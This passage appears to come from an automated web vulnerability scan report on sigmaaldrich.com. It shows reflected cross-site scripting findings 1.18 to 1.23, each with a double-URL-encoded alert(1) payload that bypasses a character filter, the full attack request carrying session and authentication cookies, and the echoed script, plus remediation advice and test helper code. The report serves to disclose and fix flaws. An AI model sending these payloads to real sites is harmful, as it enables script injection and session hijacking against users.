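function renderFixed(rawPath) {
  const url = "http://www.sigmaaldrich.com:4402" + decodeOnce(rawPath);
  return "cmCreateErrorTag(" + jsStringLiteral("Error 404 | " + url) + ',"E404") ;';
}

// Execute a rendered script body with stubbed cmCreateErrorTag/alert and
// report whether it parsed, whether alert ran, and what the tag received.
function evaluateTag(rendered) {
  const result = { syntaxError: false, alertFired: false, messages: [] };
  let fn;
  try {
    fn = new Function("cmCreateErrorTag", "alert", rendered);
  } catch (e) {
    if (!(e instanceof SyntaxError)) throw e;
    result.syntaxError = true;
    return result;
  }
  fn((msg) => result.messages.push(msg), () => { result.alertFired = true; });
  return result;
}
```

renderVulnerable(REPORTED_PATH) returns the exact script line captured in the 1.17 response, and evaluateTag reports it as a syntax error; renderVulnerable(CLOSING_PATH) parses and fires the stubbed alert, which is the condition a real attacker needs. renderFixed leaves the single-encoded and the double-encoded attempts as inert text inside the string argument. The validation-ordering point in the remediation detail follows from this: any check on the path must run on the fully canonicalised value the template will actually emit, and output encoding is what makes the remaining characters harmless.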

1.18. http://www.sigmaaldrich.com/analytical-chromatography/hplc.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/hplc.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a801%2522%253balert%25281%2529%252f%252f8a6f51f14da was submitted in the REST URL parameter 2. This input was echoed as 2a801";alert(1)//8a6f51f14da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/2a801%2522%253balert%25281%2529%252f%252f8a6f51f14da HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:04 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/2a801";alert(1)//8a6f51f14da","E404") ;
   </script>
...[SNIP]...

1.19. http://www.sigmaaldrich.com/analytical-chromatography/labware-and-equipment.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/labware-and-equipment.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16eec%2522%253balert%25281%2529%252f%252f121212b1465 was submitted in the REST URL parameter 1. This input was echoed as 16eec";alert(1)//121212b1465 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography16eec%2522%253balert%25281%2529%252f%252f121212b1465/labware-and-equipment.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:03 GMT
Content-Length: 28956
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography16eec";alert(1)//121212b1465/labware-and-equipment.html","E404") ;
   </script>
...[SNIP]...

1.20. http://www.sigmaaldrich.com/analytical-chromatography/labware-and-equipment.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/labware-and-equipment.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 234a0%2522%253balert%25281%2529%252f%252f9de4501c6b6 was submitted in the REST URL parameter 2. This input was echoed as 234a0";alert(1)//9de4501c6b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/234a0%2522%253balert%25281%2529%252f%252f9de4501c6b6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/234a0";alert(1)//9de4501c6b6","E404") ;
   </script>
...[SNIP]...

1.21. http://www.sigmaaldrich.com/analytical-chromatography/microbiology.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/microbiology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 58baf%2522%253balert%25281%2529%252f%252fa81e6945943 was submitted in the REST URL parameter 1. This input was echoed as 58baf";alert(1)//a81e6945943 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography58baf%2522%253balert%25281%2529%252f%252fa81e6945943/microbiology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:05 GMT
Content-Length: 28947
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography58baf";alert(1)//a81e6945943/microbiology.html","E404") ;
   </script>
...[SNIP]...

1.22. http://www.sigmaaldrich.com/analytical-chromatography/microbiology.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/microbiology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9439c%2522%253balert%25281%2529%252f%252fd5a28f4e792 was submitted in the REST URL parameter 2. This input was echoed as 9439c";alert(1)//d5a28f4e792 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/9439c%2522%253balert%25281%2529%252f%252fd5a28f4e792 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:07 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/9439c";alert(1)//d5a28f4e792","E404") ;
   </script>
...[SNIP]...

1.23. http://www.sigmaaldrich.com/analytical-chromatography/posters-and-cds.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/posters-and-cds.html

Issue detail

